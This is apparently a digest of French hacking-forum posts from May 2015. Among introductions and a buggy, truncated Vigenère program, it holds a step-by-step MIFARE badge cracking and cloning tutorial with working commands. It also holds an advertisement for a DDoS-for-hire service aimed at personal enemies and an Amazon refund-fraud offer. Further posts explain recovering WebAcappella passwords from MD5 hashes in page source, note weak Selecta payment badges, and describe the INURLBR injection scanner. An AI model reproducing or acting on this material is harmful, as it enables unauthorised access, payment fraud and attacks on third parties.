dimanche 31 mai 2015

demande de projets

bonsoir je recherche un projet de fin d'étude dont les contraintes sont les suivants:
durée: 03 mois
le projet en question dont etre porté sur la creation d'une entreprise.
si vous avez des propositions, s'il vous plait faite le moi savoir


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LVrAEK
via IFTTT

Présentation Bloot

Bonjour,

Pseudo : Bloot
Connaissances informatiques générales : System Linux/Windows, compétences réseaux, virtualisation
Connaissances en hacking : Crack d'un point wifi avec backtrack, avant que ça passe sur Kali
Système d'exploitation principal : Archlinux / Windows
Je viens sur ce forum pour : Apprendre la sécurité informatique en liaison développement & réseau, c'est un domaine qui me passionne !
J'ai connu ce forum via : Twitter, Il y a moins de deux ans, j'étais inscrit sur un autre forum de hacking, certain de vous (membre de staff était présent d'ailleurs). Le propriétaire de l'autre forum était hackattack il me semble
Informations supplémentaires (job, intérêts, autres...) : Actuellement Pilote (Supervision), intérêts pour la cybersécurité -> Quelques chose me dit que plus tard on en auras encore plus besoin !

Cordialement,
Bloot


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1BzNjN5
via IFTTT

Présentation Naivangel

Pseudo :Naivangel
Connaissances informatiques générales :visual basic 4 et un peu de python 3
Connaissances en hacking :très très peu
Système d'exploitation principal :windows 7
Je viens sur ce forum pour :me former au hacking pour ma culture
J'ai connu ce forum via :recherche sur le web après avoir acheté techniques de hacking de Jon Erickson
Informations supplémentaires (job, intérêts, autres...) :retraité ,informatique générale, jeux en ligne, construction et maintenance de forum.
donc beaucoup de travail pour connaitre le hacking mais c'est tellement passionnant. J'ai installé Kali sur clef USB me reste a commencer a le maitriser.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GdxG54
via IFTTT

samedi 30 mai 2015

Mr. Robot

Bonjour,

Nouvelle série sur le hacking a decouvrir de toute urgence :D Le Pilote et dispo en Vostfr, cette série semble beaucoup plus credible que le dernier film Hacker sortie cette année. Personage complexe, un vrai regal !!

Synopsis

Elliot est un jeune programmeur anti-social qui souffre d'un trouble du comportement qui le pousse à croire qu'il ne peut rencontrer des gens qu'en les hackant.

Mr-Robot.jpg

http://ift.tt/1OvMCMp
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1dE1SKk
via IFTTT

Présentation du membre : Anko死神

Sans titre-2-Récupéré.jpg

Pseudonyme : Anko死神
Connaissance en informatique (général): Je code en C++/VB.NET/SQF (dérivé du C++)/LUA (un petit peu).
Connaissance en Hacking : Presque nulle, car je ne m'y suis vraiment jamais penché.
Système d’exploitation principal : Windows 8.1
Je viens sur ce forum pour : Renforcer mes connaissances/En apprendre un peu plus sur le hacking.
J'ai connu ce forum grâce : à un membre de ce forum.
Informations complémentaires : J'ai eu 17 ans aujourd'hui, ma plus grande passion c'est la moto, en seconde vient l'informatique, je suis étudiant plus tard je veux être Trader d'options binaires.

Salut! ;)
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GLMB5p
via IFTTT

vendredi 29 mai 2015

Présentation de moi

Salut,

Je m'appel Samih , j'ai 14 ans
Je joue à la PS3 à : GTA 5 , COD BO2 , Far Cry 4 , BTF3 et Skate 3

Je débute dans le coddage grace à codecademy , j'ai àppris le HTML et J'apprend le CSS car j'aimerais crée un site web .

Mon but sur ce site est d'évoluer dans le Hacking , et savoir comment trouver le mot de passe d'un réseau Wifi (Livebox , Freebox ect)

Voilà , Bonne soirée


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FfenSe
via IFTTT

jeudi 28 mai 2015

INURLBR (recherche avancé pour la collecte d'info)

Bonjour a tous,

Nouvelle version d'INURLBR 2.1 dispo, Script PHP pouvant être utilisé pour la collecte de renseignements.



Moteur supporté:
GOOGLE / (CSE) GENERIC RANDOM / API
BING
YAHOO BR
ASK
HAO123 BR
GOOGLE (API)
LYCOS
UOL BR
YAHOO US
SAPO
DMOZ
GIGABLAST
NEVER
BAIDU BR
ANDEX
ZOO
HOTBOT
ZHONGSOU
HKSEARCH
EZILION
SOGOU
DUCK DUCK GO
BOOROW
GOOGLE(CSE) GENERIC RANDOM
Moteur avancé:
TOR FIND
ELEPHANT
TORSEARCH
WIKILEAKS
OTN
EXPLOITS SHODAN

Possibilités:
Possibility generate IP ranges or random_ip and analyze their targets.
Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
Execution external to exploit certain targets.
Generator dorks random or set file dork.
Option to set proxy, file proxy list, http proxy, file http proxy.
Set time random proxy.
It is possible to use TOR ip Random.
Debug processes urls, http request, process irc.
Server communication irc sending vulns urls for chat room.
Possibility injection exploit GET / POST => SQLI, LFI, LFD.
Filter and validation based regular expression.
Extraction of email and url.
Validation using http-code.
Search pages based on strings file.
Exploits commands manager.
Paging limiter on search engines.
Beep sound when trigger vulnerability note.
Use text file as a data source for urls tests.
Find personalized strings in return values of the tests.
Validation vulnerability shellshock.
File validation values wordpress wp-config.php.
Execution sub validation processes.
Validation syntax errors database and programming
Data encryption as native parameter.
Random google host.
Scan port.
Error Checking & values​​:
JAVA INFINITYDB,
LOCAL FILE INCLUSION,
ZIMBRA MAIL,
ZEND FRAMEWORK,
ERROR MARIADB,
ERROR MYSQL,
ERROR JBOSSWEB,
ERROR MICROSOFT,
ERROR ODBC,
ERROR POSTGRESQL,
ERROR JAVA INFINITYDB,
ERROR PHP,
CMS WORDPRESS,
SHELL WEB,
ERROR JDBC,
ERROR ASP,
ERROR ORACLE,
ERROR DB2,
JDBC CFM,
ERROS LUA,
ERROR INDEFINITE

http://ift.tt/1BwipX6


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LLVvzP
via IFTTT

INURLBR (recherche avancé pour la collecte d'info)

Bonjour a tous,

Nouvelle version d'INURLBR 2.1 dispo, Script PHP pouvant être utilisé pour la collecte de renseignements.



Moteur supporté:
GOOGLE / (CSE) GENERIC RANDOM / API
BING
YAHOO BR
ASK
HAO123 BR
GOOGLE (API)
LYCOS
UOL BR
YAHOO US
SAPO
DMOZ
GIGABLAST
NEVER
BAIDU BR
ANDEX
ZOO
HOTBOT
ZHONGSOU
HKSEARCH
EZILION
SOGOU
DUCK DUCK GO
BOOROW
GOOGLE(CSE) GENERIC RANDOM
Moteur avancé:
TOR FIND
ELEPHANT
TORSEARCH
WIKILEAKS
OTN
EXPLOITS SHODAN

Possibilités:
Possibility generate IP ranges or random_ip and analyze their targets.
Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
Execution external to exploit certain targets.
Generator dorks random or set file dork.
Option to set proxy, file proxy list, http proxy, file http proxy.
Set time random proxy.
It is possible to use TOR ip Random.
Debug processes urls, http request, process irc.
Server communication irc sending vulns urls for chat room.
Possibility injection exploit GET / POST => SQLI, LFI, LFD.
Filter and validation based regular expression.
Extraction of email and url.
Validation using http-code.
Search pages based on strings file.
Exploits commands manager.
Paging limiter on search engines.
Beep sound when trigger vulnerability note.
Use text file as a data source for urls tests.
Find personalized strings in return values of the tests.
Validation vulnerability shellshock.
File validation values wordpress wp-config.php.
Execution sub validation processes.
Validation syntax errors database and programming
Data encryption as native parameter.
Random google host.
Scan port.
Error Checking & values​​:
JAVA INFINITYDB,
LOCAL FILE INCLUSION,
ZIMBRA MAIL,
ZEND FRAMEWORK,
ERROR MARIADB,
ERROR MYSQL,
ERROR JBOSSWEB,
ERROR MICROSOFT,
ERROR ODBC,
ERROR POSTGRESQL,
ERROR JAVA INFINITYDB,
ERROR PHP,
CMS WORDPRESS,
SHELL WEB,
ERROR JDBC,
ERROR ASP,
ERROR ORACLE,
ERROR DB2,
JDBC CFM,
ERROS LUA,
ERROR INDEFINITE

http://ift.tt/1BwipX6


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LLVvzP
via IFTTT

mercredi 27 mai 2015

S.O.S Sur la création d'un Compte developpeur Google pour Android

Bonjour tout le monde, Bien, je vais tout droit au but,
Au fait, moi et mes 3 amis avons developpés une application pour smartphone Android, et c'est pour notre première fois, Nous sommes des étudiants et nous voulons la publiée sur la PlayStore mais dans le processus de création du compte developpeur, nous sommes butés à un problème : Carte de paiement.
Comme vous le savez maintenant, nous ne sommes que des simples étudiants, nous n'avons pas le moyen de payer mais on souhaite quand même publier notre application.
Je démande si quelqu'un aurait une idée pas pour contre-faire le processus de Google mais pour juste nous aidé a publier cette application.
Pour plus de précision sur l'application, il suffit juste de me démander ce que vous souhaiter savoir.
Je suis dans la République Démocratique du Congo, précisement dans la ville de Lubumbashi.
Cordialement.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1HMT5lK
via IFTTT

mardi 26 mai 2015

[RFID/NFC] Le matériel

Réupload suite à problème d'envoi lié au cookie de connexion trop court !
Méchant cookie ! :mad:

Petit Post sur le matos en attendant d'avoir un accord pour mettre des liens Ebay
et Amazon pour recenser les produits fonctionnels.

Les lecteurs RFID

Pour pouvoir lire les cartes, les modifier et les écrire, il nous un lecteur qui puisse également écrire.
Pour ce, aucun lecteur en dessous de 30€ ne le permet. Tous les lecteurs labellisé "NFC" ont la fonction écriture.
Plusieurs lecteurs existent en terme de portée de lecture lié à la fréquence comme indiqué dans ce sujet.
Ici, pour nos modifications, un lecteur simple de 125kHz suffira.

téléchargement.jpg
Mon lecteur-Encodeur RFID 13.56kHz : 35€ sur Ebay (Attention aux copies de ce modèle, il y en a beaucoup)

Le 13,56 kHz ayant l'utilité de pouvoir lire tous les tags, cartes et badges en circulation.
Certains lecteurs sur cette fréquence peuvent avoir une distance de lecture jusqu'à 1m50.
51EBpqgcp6L._SY300_.jpg
Un module RFID peut-être également branché sur les Arduino-Uno pour la lecture et l'encodage.

NFC_Fotolia_71499707_XS.jpg

Enfin, pour une simple lecture de vos badges, tags et cartes, un smartphone équipé de la technologie NFC et l'application de lecture peut être utilisé.
Les puces NFC de smartphone lisent sur une fréquence de 125kHz et ne permettent pas
l'encodage due à l'architecture Android.

Liste des lecteurs achetables :
[A venir, après accord admin]

Les tags NFC

Sans titre 2.jpg

On les retrouve un peu partout ces petits tags-là.
Ils ont plusieurs formes, ils peuvent être dans nos abris de bus, sur les cartes de villes,
pour nous accompagner dans les musées. Ils sont bien souvent dédiée à une utilisation marketing ou touristique.

Sans titre 4.jpg

Ils sont tous composées de fil de cuivre formant un cercle fermé jouant le rôle d'antenne
avec une puce reliée stockant les informations.

Ces tags sont souvent moins sécurisés ou non encryptées (donc modifiable facilement)
car ils sont utilisés à un but informatif.

Liste des tags achetables :
[A venir, après accord admin]

Les cartes

[Suite à Venir, j'ai pas le courage de tout écrire ce soir]
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1AwrQJH
via IFTTT

lundi 25 mai 2015

Questions Pentesting

Bonjour, Je regardais un reportage hier sur l’espionnage industrielle et dans celui-ci on a assisté a une attaque en direct, cependant j'avais quelques questions a vous poser...

Voici le lien du reportage en question ( l'attaque commence a 18 minutes sur la première vidéo ;) ) http://ift.tt/1PHfGo5

Donc mes questions sont les suivantes :

- Comment il usurpe l'adresse mail de la personne ?

- D'après ce que j'ai compris il utilise un exploit .doc mais ses exploits sont très souvent détecté même après encodage avec Metasploit donc peux on en trouver des "FUD" car quand la personne dans le reportage dit " C'est trouvable par tout le grand public etc... J'en doute ?

- Et dernière question est-ce que certain d'entre vous reconnaisse les outils qu'il utilise ?

Merci par avance la compagnie


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Kh4LLg
via IFTTT

dimanche 24 mai 2015

Cpu

Bonjour, bonsoir
Je possède un portable et j'aimerais augmenter ses performances.
Ma question est ; suis-je obliger de prendre un processeur intel inside ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FNYnwX
via IFTTT

Harry-stot Amazon Remboursement | 15% | .fr / .co.uk / .com | 1 An + D'expérience |



Preuves :
 
http://ift.tt/1FwMpoj
- http://ift.tt/1FwMmZC
http://ift.tt/1PFbGob (remplacement)
http://ift.tt/1PFbFAu
- http://ift.tt/1FwMmZE
- http://ift.tt/1PFbGod
- http://ift.tt/1FwMmZI
http://ift.tt/1PFbGoh
 
FAQ :

Q : Qu'est que c'est ?
A :
➝ Il s'agit d'un service de remboursement pour amazon.fr, .co.uk et . com
➝ En utilisant mon service, vous aurez la totalité de votre commande remboursé directement sur votre compte bancaire (sans avoir besoin de renvoyer l'objet reçu)

Skype : harry-stot
Je répond a toutes vos questions


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FwMpop
via IFTTT

jeudi 21 mai 2015

[RFID/NFC] [Work in progress] Sécurité de badge/clés

Ce sujet vas être un peu le fil rouge de mes travaux concernant le RFID/NFC.
Avec le lecteur que j'avais acheté, une carte vierge chinoise était livré.
Je suis en attente d'en recevoir d'autres (2-3 semaines de livraison), je devrais les avoir début Juin pour faire les tests suivants.
Je passe en vert si ça a marché, en rouge, si ça ne marche pas, en orange, si il y a une possibilité qui nécessite de la documentation.

Sécurité des badges/clés :

- :cool: Badge d'immeuble :
Tag Rfid sur une base de 125khZ (portée jusqu'à 30cm).
Données encryptées mais aucune clé de sécurité.
Deux variables pour le récepteur, id de la carte accepté ou refusé.


- :confused: Badge Distributeur Selecta :
Tag NFC sur une base de 125khZ (portée jusqu'à 30cm).
Données encryptées comprenant une clé de sécurité bloquant l'accès aux blocks d'écriture.
Clé de sécurité injectable ne comprenant que 64 possibilités.
Montant du badge en € disponible sur la clé et non stocké par la machine.
Après discussion avec le dépanneur de Selecta, les machines ne sont pas reliés en réseau.
Un id correspond au client et à la carte.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1K4bWGq
via IFTTT

Tutoriel [RFID/NFC] Cloner un tag/carte RFID

Le Matériel

- Lecteur NFC/RFID (fonction writer).
- Distribution Kali Linux
- Carte Chinoise Mifare vierge avec backdoor.
- Carte/Badge officiel à copier

Dumping/cracking des cartes

Pour commencer, il faut faire un "dump" des cartes afin de casser les clés d'encryptages utilisée sur la carte officielle
pour permettre une recopie exacte des données stockées.

Citation:

// Placez la carte chinoise sur votre lecteur :

# mfoc -P 500 -O carte-chinoise.dmp
Citation:

// Placez la carte officielle sur votre lecteur :

# mfoc -P 500 -O carte-officielle.dmp
Clonage de la carte

On procède maintenant au clonage de la carte.

Citation:

// Placez la carte chinoise votre lecteur :

# nfc-mfclassic w a carte-officielle.dmp carte-chinoise.dmp
Modification du numéro de série

Pour que la carte soit cloné et identifié complètement, il faut maintenant modifier le numéro de série de la carte chinoise avec l'officielle.

Citation:

// Placez la carte officielle votre lecteur :

# nfc-list
Le numéro de série s'affiche, notez-le puis mettez-le dans la commande suivante.

Citation:

// Placez la carte chinoise votre lecteur :

# nfc-mfsetuid XXXXXX
Pour terminer, vérifier que la commande a bien fonctionné :

Citation:

# nfc-list
Vous disposez maintenant de deux cartes identiques dont une non protégée pouvant servir à faire des modifications sur celle-ci.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1FDyuA7
via IFTTT

mercredi 20 mai 2015

[RFID/NFC] Débarrasser sa carte du paiement sans contact

Le titre du message est assez explicite, si vous avez lu le post précédent,
vous savez maintenant que les cartes à paiement sans contact présente une faille majeure,
et si vous ne souhaitez pas utiliser le paiement sans contact,

il vous reste deux possibilités :
- Insister auprès de la banque pour obtenir une carte sans antenne NFC (compliqué)
- Désactiver l'antenne NFC vous-même.

Fonctionnement

A l'instar d'un tag RFID, il n'y a pas de puce type RFID.
La puce de la carte comprend les informations de celle-ci et une antenne permet la communication et le transfert des données.
L'antenne fait le tour de la puce et en ressort plusieurs fois.
Selon les cartes, l'antenne est disposé différemment, il faut donc la trouver.

Désactivation dans 3,2,1...

Si vous pouvez compter sur vos dix doigts pour être un minimum rigoureux et précis dans
la marche à suivre que je vous donne, alors cette désactivation est à votre portée.

/!\ Avertissement : Votre établissement bancaire n'autorise pas les modifications de carte comme celle-ci,
il sera donc inutile de s'en venter auprès de votre conseiller /!\


Matériel

- Lampe de poche puissante
- Cutter
- OU DREMEL/Set de Gravure
- Kinder Maxi pour ne pas mourir affamé

Marche à suivre



Par transparence, avec la lampe de poche, repérer l’antenne NFC au verso de la carte :
il s’agit de la piste qui fait plusieurs tours et qui sort de la puce.



Au feutre, marquez sur la carte l’endroit où percer cette antenne,
en évitant les zones de la puce et de la bande magnétique bien entendu !



Calez bien la carte dans un étau, à l'aide du cutter ou d'un dremel,
creusez jusqu'à atteindre l'antenne, (il ne faut pas transpercer la carte).
Pour plus de discrétion, recolorez ou reboucher le trou.

Bravo, votre carte ne dispose plus du paiement sans contact !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1AmDrLi
via IFTTT

[RFID/NFC] Le Paiement sans contact : C'est pratique, mais est-ce sécurisé ?

Sans titre 2.png

C'est quoi le paiement sans contact ?

Le paiement sans contact permet au client de ne pas saisir son code lors du paiement sur le terminal bancaire du commerçant.
L'achat est donc facilité et plus rapide puisqu'il suffit un simple passage de la carte sur l'écran du terminal bancaire et l'encaissement est réalisé. Bien sur, la limite est de 20€ par paiement et 100€ par semaine. Si la limite est atteinte, le code sera demandée.
Le paiement peut se faire également via un smartphone.

La technologie de votre carte bleue sans contact
Technologie de communication de proximité Echange de données avec les terminaux compatible NFC. Débit maximum de 424 Kbits/s avec fréquence de 125KhZ.

Les données de la carte sont-elles sécurisées ?

La carte ne peut être visible que en "lecture seule", c'est à dire qu'elle ne peut être que lue et non modifiable. La plupart des données sont cryptées cependant plusieurs informations capitales sont visibles et peuvent être utilisées pour faire des achats sur internet :
 Les numéros de la carte
 La date d'expiration
 Les 20 dernières transactions*
 Le nom du titulaire de la carte*
*Les dernières informations ne sont pas toujours visibles selon les cartes.

Je fais comment pour lire ma carte bleue ?
Si vous souhaitez essayer de lire votre carte bleue pour comprendre comment ça marche, vous pouvez utiliser votre smartphone si il dispose
du NFC ou faire l'acquisition d'une clé USB NFC pour la lire sur votre PC. Sur smartphone, rendez-vous sur le playstore ou l'applestore
et chercher une application de type "lecteur NFC".

Comment sécuriser sa carte bleue sans contact ?
Pour éviter que les données de votre carte soient récupérés par une personne mal intentionnée, il existe plusieurs moyens de protection pour votre carte. La première est le principe de la cage de faraday, il s'agit d'emballer votre CB dans l'aluminium. Bon je suis d'accord, c'est pas pratique. Il existe aujourd'hui des portefeuilles métalliques ou même des étuis (5€ l'étui) pour CB qui empêchent les ondes d'émettre. Un site français avec fabrication 100% made in France s'est ouvert récemment
et propose les étuis à 4.50€/pièce. http://ift.tt/1Bd0mDG

Sans titre 4.jpg
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Bd0l2K
via IFTTT

[RFID/NFC] Qu'est-ce que le RFID/NFC ?

De nos jours avec l'avancement technologique des smartphones, on entend parler de plus en plus de la technologie du NFC.
Seulement le NFC n'est pas le seul système sans fil à permettre des intéractions en terme de fonctionnement mais aussi de sécurité.

Qu'est que c'est ?

Le RFID (Radio Fréquence Identification) se compose :
- un émetteur (étiquettes, tags, marqueurs, identifiants, badge, clés..)
- un récepteur (base station, TPE..)

L'émetteur contient une puce qui stocke les informations communicant avec le récepteur et une antenne permettant de le détecter.
L'émetteur a une radio fréquence qui se mesure en hertz.



Quand à lui le récepteur, il fournit l'énergie via une impulsion électromagnétique pour permettre à l'émetteur et le récepteur de communiquer ensemble.

Différence RFID/NFC

Le NFC (Near Field Communication : Communication en champ proche en français) est un genre diminué de RFID.
Il fonctionne sur le même principe. La seule différence est sur la distance.

Dans les émetteurs, la puce et l'antenne changent les distances où l’interaction peut se faire.

Distance de lecture

Le NFC est une communication qui se fait jusqu'à 30cm avec un récepteur capable de le détecter sinon la plupart des appareils sont équipés pour fonctionner à moins d'un cm.
Quand à eux, les technologies associés au NFC sont faites sur la fréquence 125Khz.

Selon la puissance en hertz, la distance de détection s'agrandit :
- Passif 13.56 Mhz : 1m50
- Passif 860 à 960 Mhz : 15m
- Actif 433 Mhz : 500m
- Actif 2.45 Ghz: 100m

Les deux dernières fréquences en actif sont utilisées pour les technologies radiocommandées.

Utilisations

Aujourd'hui, la technologie RFID/NFC se retrouve dans divers moyens de sécurité partout dans notre vie :
- Badge d'accès Immeuble/Travail
- Badge de machine à cafés (clé coges)
- Puce de votre animal
- Clé de lavage
- Carte de Paiement Visa sans contact
- Smartphones
- Abri de bus connectée
- Carte de transport (Navigo par exemple).
- Et bien d'autres...

Fin

En espérant que ça vous aura plus, j'espère avoir été assez clair.
N'hésitez pas à poser des questions si certains passages sont à renforcer en informations !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Bd0mns
via IFTTT

Présentation

Salut je suis un petit nouveau venu pour apprendre et acquérir de nouvelles compétence si le forum me le permet, merci à tous


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1F2BwrP
via IFTTT

mardi 19 mai 2015

News DDoS

Hey les membres, après de long mois de travail le DDoS le plus puissant du marché est enfin en ligne !

J'ai mit du temps mais le résultat est surprenant, dispo ici https://ddos.city

Likez la page fb pour recevoir le code de réduc de - 10 % http://ift.tt/1edNFni

☆ Puissance d'attaque exceptionnelle de 125 GBPS ☆
DDoS City vous permet de :
● Rendre indisponible un site web
● Rendre indisponible la connexion internet d'un de vos ennemis pendant la durée de votre choix en possédant son Skype, TeamSpeak, Minecraft, etc..
● Connaitre l'IP d'une machine, géolocaliser une IP, etc ...
☆ Puissance d'attaque exceptionnelle de 125 GBPS ☆
Armez vous dès maintenant ☛ https://ddos.city


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1edNFnk
via IFTTT

lundi 18 mai 2015

Section Hacking RFID

Je propose l'ajout d'une section RFID/NFC qui sont des technologies assez faillible donc intéressante sur le point de vue sécurité.

J'ai le matériel et jy connais un peu ce pourquoi la creation de cette section m'intéresserait.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Ah41Ft
via IFTTT

Suite de nombres

Bonjour,

Je viens vers vous avec un petit challenge (qui est en fait également une question).
Je m'explique :

J'ai pris part à un concours de programmation dont l'énoncé était le suivant :
Soit X un nombre fixé par l'utilisateur, vous devez trouver le chemin le plus court démarrant 2 et allant vers ce nombre donné. Les opérations permises sont les suivantes : +2, -2, /2, *2.

J'ai fait ma propre méthode de résolution, mais je me demandais si, d'après vous, cette méthode est celle donnant le chemin (le nombre d'opérations à effectuer) le plus court.

La voici (pour ceux qui veulent tenter de résoudre le challenge évitez de lire ma résolution :rolleyes:) en C# :

Code:

static void Main(string[] args)
        {
            int x = 37;

            List<string> liste = new List<string>();

            if (x % 2 == 1)
            {
                x *= 2;
                liste.Add("*");
            }

            int y = 0;
            while (Math.Pow(2, y) < x) y++;

            int dist1 = (int)Math.Pow(2, y) - x;
            int dist2 = x - (int)Math.Pow(2, (y - 1));

            if (dist1 < dist2)
            {
                while (x < Math.Pow(2, y))
                {
                    x = x + 2;
                    liste.Add("+");
                }
            }
            else
            {
                while (x > Math.Pow(2, (y-1)))
                {
                    x = x - 2;
                    liste.Add("-");
                }
            }

            while (x != 2)
            {
                x /= 2;
                liste.Add("/");
            }

            for (int i = (liste.Count - 1); i >= 0; i--)
            {
                switch (liste[i])
                {
                    case "-":
                        Console.WriteLine("+");
                        break;
                    case "+":
                        Console.WriteLine("-");
                        break;
                    case "*":
                        Console.WriteLine("/");
                        break;
                    case "/":
                        Console.WriteLine("*");
                        break;
                }
            }
            Console.ReadLine();
        }

Veuillez m'excuser si le code n'est pas optimal, je l'ai écrit rapidement.
Dans cet exemple, le chiffre à atteindre (désigné par la variable x) n'est par exemple pas demandé à l'utilisateur mais bien fixé dans le code.

Pensez vous que cette méthode de résolution donne le résultat le plus court ?
Quelle est votre méthode pour ce problème ?

Merci beaucoup pour vos réactions.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1S1MxCP
via IFTTT

WebAccapella : Page protégée par mot de passe

[Merci de me déplacer le sujet si il est pas à la bonne place].

WebAccappella est un outil de création de site simplifié.
Il propose en l'occurence une option de page protégée par un mot de passe.

Le mot de passe est hashée en MD5 mais il est simplement visible dans le code source de la page en question ce qui le rend très vulnérable.
Dans un site webaccappela, cherchez simplement la ligne "<input type="password" class="waInputPassword param[crc(LECODEHASHMD5)]"/>">"
prenez le code MD5 et lancez un décrypteur de MD5 pour obtenir le mot de passe.

Manipulation simple, facile et déconcertante.
Bref Webaccappela reste pour ceux qui n'y connaissent rien et devra être oublié très vite.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PtOMAa
via IFTTT

dimanche 17 mai 2015

Présentation Ludan

Pseudo :
Ludan

Connaissances informatiques générales :
Vaste base, principalement utilisateur de windows vista/xp/7
HTML


Connaissances en hacking :
/

Système d'exploitation principal :
Windows/Kali-linux/ubuntu

Je viens sur ce forum pour :
Apprendre ce qui me tombera sous la main!

J'ai connu ce forum via :
Des forums en parlant, des navigations sur le net concernant Kali.

Informations supplémentaires (job, intérêts, autres...) :
Informatique, muscu, musique :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LbxtOo
via IFTTT

Présentation: Bakgamon

Pseudo: Bakgamon

Connaissances informatiques générales:
Je connais le JAVA/Balisage/POO/SQL. Je débute actuellement en C(C,C++,C#), disons que c'est de la curiosité :)
Je connais assez bien l'hardware aussi; ayant monté plusieurs fois des machines pour moi ou mes proches, c'est en forgeant que l'on devient forgeron comme on dit ;)

Connaissances en hacking: Aucune ou presque ! Je suis justement la pour ça :cool: .

Système d'exploitation principal: Windows 7 Ultimate x64 / Ubuntu 14.10 (L'un pour jouer, l'autre pour bosser ;) )

Je viens sur ce forum pour: Perfectionner mon développement et apprendre à me défendre.

J'ai connu ce forum via: Une recherche sur la sécurité via Google

Informations supplémentaires (job, intérêts, autres...) :Actuellement dev web, bientôt en freelance; la sécurité du web me passionne assez.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Lbxr93
via IFTTT

[projet] Chiffre de Vigenère

Bonjour à tous,

J'ai lu quelques articles sur la cryptologie, et le chiffre de Vigenère me semble être un bon début

pour s'initier dans la crypto'. J'ai donc pour projet d'implémenter cette manière de crypté en C. Je ne sais pas si c'est

le meilleur langage pour faire cela, je sais seulement que je suis capable de le faire en C.

Voici comment le programme devrait se comporté :

Chiffre de Vigenère :

Code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char* inUpperCase(const char chaine[]) {

    char  alphabet[26]  = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',0};
    char  alphabet0[26] = {'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',0};
    char    cache[100] = {0};
    int              i = 0;
    int              j = 0;
    int          trouve = 0;

    for(i=0;i<strlen(chaine);i++){
        for(j=0;i<strlen(alphabet) && !trouve;j++) {
            if(chaine[i] == alphabet[j])
            {
                cache[i] = alphabet0[j];
                trouve = 1;
            }
            else
            {
                cache[i] = chaine[i];
            }
        }
        trouve = 0;
    }
    return cache;
}

int main()
{
    char  alphabet0[26]  = {'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',0};
    char  alphabet1[26]  = {'B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A',0};
    char  alphabet2[26]  = {'C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B',0};
    char  alphabet3[26]  = {'D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C',0};
    char  alphabet4[26]  = {'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D',0};
    char  alphabet5[26]  = {'F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E',0};
    char  alphabet6[26]  = {'G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F',0};
    char  alphabet7[26]  = {'H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G',0};
    char  alphabet8[26]  = {'I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H',0};
    char  alphabet9[26]  = {'J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','A','B','C','D','E','F','G','H','I',0};
